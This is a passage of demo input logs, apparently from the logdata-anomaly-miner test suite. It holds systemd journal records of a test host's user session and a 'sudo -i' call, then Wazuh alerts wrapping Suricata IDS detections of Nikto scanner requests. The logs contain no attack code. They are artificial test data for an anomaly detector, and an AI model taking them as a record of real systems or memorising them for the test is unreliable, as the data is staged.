"__MONOTONIC_TIMESTAMP" : "166758798", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_EXE" : "/lib/systemd/systemd", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "MESSAGE" : "pam_unix(systemd-user:session): session opened for user ubuntu by (uid=0)", "_PID" : "1103", "_COMM" : "(systemd)", "_CMDLINE" : "(systemd)", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : 
"1615280941040532" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=369;b=e2b08827b5804427b422c10c84f1567e;m=9f09ebd;t=5bd16e6b41e24;x=19c833f3edf7cc95", "__REALTIME_TIMESTAMP" : "1615280941047332", "__MONOTONIC_TIMESTAMP" : "166764221", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "SYSLOG_FACILITY" : "4", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-logind", "_PID" : "784", "_COMM" : "systemd-logind", "_EXE" : "/lib/systemd/systemd-logind", "_CMDLINE" : "/lib/systemd/systemd-logind", "_CAP_EFFECTIVE" : "24420002f", "_SYSTEMD_CGROUP" : "/system.slice/systemd-logind.service", "_SYSTEMD_UNIT" : "systemd-logind.service", "_SYSTEMD_INVOCATION_ID" : "92ace4bf8cc84ed790e29aea96b87129", "CODE_FILE" : "../src/login/logind-session.c", "CODE_LINE" : "633", "CODE_FUNC" : "session_start", "MESSAGE_ID" : "8d45620c1a4348dbb17410da57c60c66", "SESSION_ID" : "1", "USER_ID" : "ubuntu", "LEADER" : "1092", "MESSAGE" : "New session 1 of user ubuntu.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941042545" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36a;b=e2b08827b5804427b422c10c84f1567e;m=9f360e2;t=5bd16e6b6e049;x=c762ed8af5f522cf", "__REALTIME_TIMESTAMP" : "1615280941228105", "__MONOTONIC_TIMESTAMP" : "166944994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "MESSAGE" : "Reached target Timers.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "USER_UNIT" : "timers.target", "USER_INVOCATION_ID" : "c32bba9a46b6418a87022db13a18acc5", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : 
"/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941228074", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36b;b=e2b08827b5804427b422c10c84f1567e;m=9f39479;t=5bd16e6b713e1;x=867aa9f125e4a6b0", "__REALTIME_TIMESTAMP" : "1615280941241313", "__MONOTONIC_TIMESTAMP" : "166958201", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent (ssh-agent emulation).", "USER_UNIT" : "gpg-agent-ssh.socket", "USER_INVOCATION_ID" : 
"e08cb56c58754a8398efac483a1dba4d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229248" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36c;b=e2b08827b5804427b422c10c84f1567e;m=9f39539;t=5bd16e6b714a0;x=400e7f2353aa30d4", "__REALTIME_TIMESTAMP" : "1615280941241504", "__MONOTONIC_TIMESTAMP" : "166958393", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (access for web browsers).", "USER_UNIT" : "gpg-agent-browser.socket", "USER_INVOCATION_ID" : "b39e086c7b804706842cb5400720e511", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229328" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36d;b=e2b08827b5804427b422c10c84f1567e;m=9f395ca;t=5bd16e6b71531;x=52761cb2e41930ca", "__REALTIME_TIMESTAMP" : "1615280941241649", "__MONOTONIC_TIMESTAMP" : "166958538", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", 
"SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache (restricted).", "USER_UNIT" : "gpg-agent-extra.socket", "USER_INVOCATION_ID" : "ee556158c4bf463385dec9fc66af4c30", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229417" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36e;b=e2b08827b5804427b422c10c84f1567e;m=9f39631;t=5bd16e6b71599;x=5184e17a5bcb18ae", "__REALTIME_TIMESTAMP" : "1615280941241753", "__MONOTONIC_TIMESTAMP" : "166958641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", 
"_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Paths.", "USER_UNIT" : "paths.target", "USER_INVOCATION_ID" : "e5185ac070ea4df98a4b00c613372bef", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229430" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=36f;b=e2b08827b5804427b422c10c84f1567e;m=9f39694;t=5bd16e6b715fb;x=8814a2efb8bec83b", "__REALTIME_TIMESTAMP" : "1615280941241851", "__MONOTONIC_TIMESTAMP" : "166958740", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG network certificate management daemon.", "USER_UNIT" : "dirmngr.socket", "USER_INVOCATION_ID" : "55274947c49b4c41b3476d8adca963a3", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229505" } { "__CURSOR" : 
"s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=370;b=e2b08827b5804427b422c10c84f1567e;m=9f39702;t=5bd16e6b71669;x=46fe52ce71c1fcf7", "__REALTIME_TIMESTAMP" : "1615280941241961", "__MONOTONIC_TIMESTAMP" : "166958850", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on GnuPG cryptographic agent and passphrase cache.", "USER_UNIT" : "gpg-agent.socket", "USER_INVOCATION_ID" : "1f52d7a7d03443b58a9f67be9e3267f8", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229589" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=371;b=e2b08827b5804427b422c10c84f1567e;m=9f3976b;t=5bd16e6b716d2;x=ca1e497010c4b6c5", "__REALTIME_TIMESTAMP" : "1615280941242066", "__MONOTONIC_TIMESTAMP" : "166958955", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", 
"_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Sockets.", "USER_UNIT" : "sockets.target", "USER_INVOCATION_ID" : "57308a089fb44c85aa8b28764208cbb1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229604" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=372;b=e2b08827b5804427b422c10c84f1567e;m=9f397cd;t=5bd16e6b71734;x=c94451d35f946e0", "__REALTIME_TIMESTAMP" : "1615280941242164", "__MONOTONIC_TIMESTAMP" : "166959053", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Basic System.", "USER_UNIT" : "basic.target", "USER_INVOCATION_ID" : "9279cf273e684a6cb8f893a4238d4ce9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229614" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=373;b=e2b08827b5804427b422c10c84f1567e;m=9f3982d;t=5bd16e6b71795;x=cfe3a72a477d7ed5", "__REALTIME_TIMESTAMP" : "1615280941242261", "__MONOTONIC_TIMESTAMP" : "166959149", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "user@1000.service", "INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "MESSAGE" : "Started User Manager for UID 1000.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941229762" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=374;b=e2b08827b5804427b422c10c84f1567e;m=9f398b2;t=5bd16e6b71819;x=759f2aa62d425194", "__REALTIME_TIMESTAMP" : "1615280941242393", "__MONOTONIC_TIMESTAMP" : "166959282", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "SYSLOG_IDENTIFIER" : "systemd", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", 
"_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Default.", "USER_UNIT" : "default.target", "USER_INVOCATION_ID" : "deceef39a2384492929e08a3ad22033b", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941231978" } { "__CURSOR" : "s=b561a865bb2f43f8b38c4b1fb9ac78ae;i=375;b=e2b08827b5804427b422c10c84f1567e;m=9f39918;t=5bd16e6b71880;x=c18702b1dbf43c11", "__REALTIME_TIMESTAMP" : "1615280941242496", "__MONOTONIC_TIMESTAMP" : "166959384", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_TRANSPORT" : "journal", "_PID" : "1103", "_UID" : "1000", "_GID" : "1000", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/lib/systemd/systemd --user", "_CAP_EFFECTIVE" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_AUDIT_SESSION" : "2", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/user@1000.service/init.scope", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_UNIT" : "user@1000.service", "_SYSTEMD_USER_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "_SYSTEMD_INVOCATION_ID" : "70ea038d911745e89e876eac8461b685", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/core/manager.c", "CODE_LINE" : "3272", "CODE_FUNC" : "manager_notify_finished", "MESSAGE_ID" : "eed00a68ffd84e31882105fd973abdd1", "USERSPACE_USEC" : 
"179998", "MESSAGE" : "Startup finished in 179ms.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280941232011" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=376;b=e2b08827b5804427b422c10c84f1567e;m=bc70466;t=5bd16e88a83cd;x=4643ca9ef29700d7", "__REALTIME_TIMESTAMP" : "1615280971875277", "__MONOTONIC_TIMESTAMP" : "197592166", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "PRIORITY" : "5", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_UID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "MESSAGE" : " ubuntu : TTY=pts/0 ; PWD=/home/ubuntu ; USER=root ; COMMAND=/bin/bash", "_PID" : "1234", "_GID" : "1000", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", "_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971874922" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=377;b=e2b08827b5804427b422c10c84f1567e;m=bc71293;t=5bd16e88a91fb;x=c5d63933ce56dcfb", "__REALTIME_TIMESTAMP" : "1615280971878907", "__MONOTONIC_TIMESTAMP" : "197595795", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "10", "_AUDIT_LOGINUID" : "1000", "_SYSTEMD_OWNER_UID" : "1000", "_SYSTEMD_SLICE" : "user-1000.slice", "_SYSTEMD_USER_SLICE" : "-.slice", "SYSLOG_IDENTIFIER" : "sudo", "_PID" : "1234", "_COMM" : "sudo", "_EXE" : "/usr/bin/sudo", "_CMDLINE" : "sudo -i", 
"_AUDIT_SESSION" : "1", "_SYSTEMD_CGROUP" : "/user.slice/user-1000.slice/session-1.scope", "_SYSTEMD_SESSION" : "1", "_SYSTEMD_UNIT" : "session-1.scope", "_SYSTEMD_INVOCATION_ID" : "2b1962eb80184110bd624cc00819ebf7", "MESSAGE" : "pam_unix(sudo:session): session opened for user root by ubuntu(uid=0)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280971878330" } logdata-anomaly-miner-2.8.0/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/wazuh.log000066400000000000000000005173061500476301700315310ustar00rootroot00000000000000{"timestamp":"2020-03-04T19:18:35.196472+0000","rule":{"level":6,"description":"IDS event.","id":"20101","firedtimes":1,"mail":false,"groups":["ids"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.5603","full_log":"03/04/2020-19:18:35.196472 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:47564 -> 192.168.10.154:80","predecoder":{"timestamp":"03/04/2020-19:18:35.196472"},"decoder":{"parent":"snort","name":"snort"},"data":{"srcip":"192.168.10.238","dstip":"192.168.10.154:80","id":"1:2221030:1"},"location":"/var/log/forensic/suricata/fast.log"} {"timestamp":"2020-03-04T19:18:34.343787+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant character","id":"86601","firedtimes":1,"mail":false,"groups":["ids","suricata"]},"agent":{"id":"000","name":"user-0"},"manager":{"name":"user-0"},"id":"1587995587.6012","full_log":"{\"timestamp\":\"2020-03-04T19:18:34.343787+0000\",\"flow_id\":2066313044966357,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.238\",\"src_port\":46938,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2221030,\"rev\":1,\"signature\":\"SURICATA HTTP METHOD terminated by non-compliant character\",\"category\":\"Generic Protocol 
Command Decode\",\"severity\":3},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"/bISn4adA.ncf\",\"http_user_agent\":\"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":400,\"length\":226}}","decoder":{"name":"json"},"data":{"timestamp":"2020-03-04T19:18:34.343787+0000","flow_id":"2066313044966357.000000","in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.238","src_port":"46938","dest_ip":"192.168.10.154","dest_port":"80","proto":"TCP","tx_id":"0","alert":{"action":"allowed","gid":"1","signature_id":"2221030","rev":"1","signature":"SURICATA HTTP METHOD terminated by non-compliant character","category":"Generic Protocol Command Decode","severity":"3"},"http":{"hostname":"mail.cup.com","url":"/bISn4adA.ncf","http_user_agent":"Mozilla/5.00 (Nikto/2.1.5) (Evasions:6) (Test:map_codes)","http_content_type":"text/html","http_method":"GET","protocol":"HTTP/1.1","status":"400","length":"226"}},"location":"/var/log/forensic/suricata/eve.json"} {"timestamp":"2020-03-04T19:18:34.345338+0000","rule":{"level":3,"description":"Suricata: Alert - SURICATA HTTP METHOD terminated by non-compliant 